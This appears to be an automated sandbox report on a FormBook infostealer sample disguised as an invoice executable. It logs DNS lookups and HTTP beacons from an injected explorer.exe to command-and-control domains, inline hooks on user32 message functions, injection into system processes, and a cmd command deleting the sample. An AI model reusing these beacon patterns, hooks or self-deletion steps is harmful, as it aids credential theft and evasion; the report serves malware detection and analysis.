                                              May 12, 2021 07:33:17.362968922 CEST192.168.2.78.8.8.80x4944Standard query (0)www.sequenceanalytica.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 12, 2021 07:32:34.021111012 CEST8.8.8.8192.168.2.70x411fNo error (0)www.manifestarz.commanifestarz.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 07:32:34.021111012 CEST8.8.8.8192.168.2.70x411fNo error (0)manifestarz.com34.102.136.180A (IP address)IN (0x0001)
                                              May 12, 2021 07:32:56.526810884 CEST8.8.8.8192.168.2.70x7f89No error (0)www.funtimespheres.com107.165.40.251A (IP address)IN (0x0001)
                                              May 12, 2021 07:33:17.430162907 CEST8.8.8.8192.168.2.70x4944No error (0)www.sequenceanalytica.comsequenceanalytica.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 07:33:17.430162907 CEST8.8.8.8192.168.2.70x4944No error (0)sequenceanalytica.com184.168.131.241A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.manifestarz.com
                                              • www.funtimespheres.com
                                              • www.sequenceanalytica.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.74972334.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 07:32:34.071719885 CEST1486OUTGET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1
                                              Host: www.manifestarz.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 07:32:34.208539009 CEST1486INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 12 May 2021 05:32:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "60995c0c-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.749732107.165.40.25180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 07:32:56.725887060 CEST5426OUTGET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1
                                              Host: www.funtimespheres.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 07:32:57.152642012 CEST5427INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Wed, 12 May 2021 13:33:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 355
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 2f 22 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><meta http-equiv="refresh" content="0; url=/"></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.749733184.168.131.24180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 07:33:17.629102945 CEST5429OUTGET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1
                                              Host: www.sequenceanalytica.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 07:33:17.924803019 CEST5429INHTTP/1.1 301 Moved Permanently
                                              Server: nginx/1.16.1
                                              Date: Wed, 12 May 2021 05:33:17 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Location: http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:07:31:19
                                              Start date:12/05/2021
                                              Path:C:\Users\user\Desktop\INv02938727.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\INv02938727.exe'
                                              Imagebase:0xd0000
                                              File size:719360 bytes
                                              MD5 hash:A3B74ACF9723E53D6CAEA736FAAE9708
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:07:31:23
                                              Start date:12/05/2021
                                              Path:C:\Users\user\Desktop\INv02938727.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\INv02938727.exe
                                              Imagebase:0x7f0000
                                              File size:719360 bytes
                                              MD5 hash:A3B74ACF9723E53D6CAEA736FAAE9708
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:07:31:25
                                              Start date:12/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff662bf0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:07:31:48
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\autochk.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autochk.exe
                                              Imagebase:0x280000
                                              File size:871424 bytes
                                              MD5 hash:34236DB574405291498BCD13D20C42EB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:07:31:54
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\control.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\control.exe
                                              Imagebase:0xb90000
                                              File size:114688 bytes
                                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:07:31:56
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\INv02938727.exe'
                                              Imagebase:0x1320000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:07:31:56
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff774ee0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >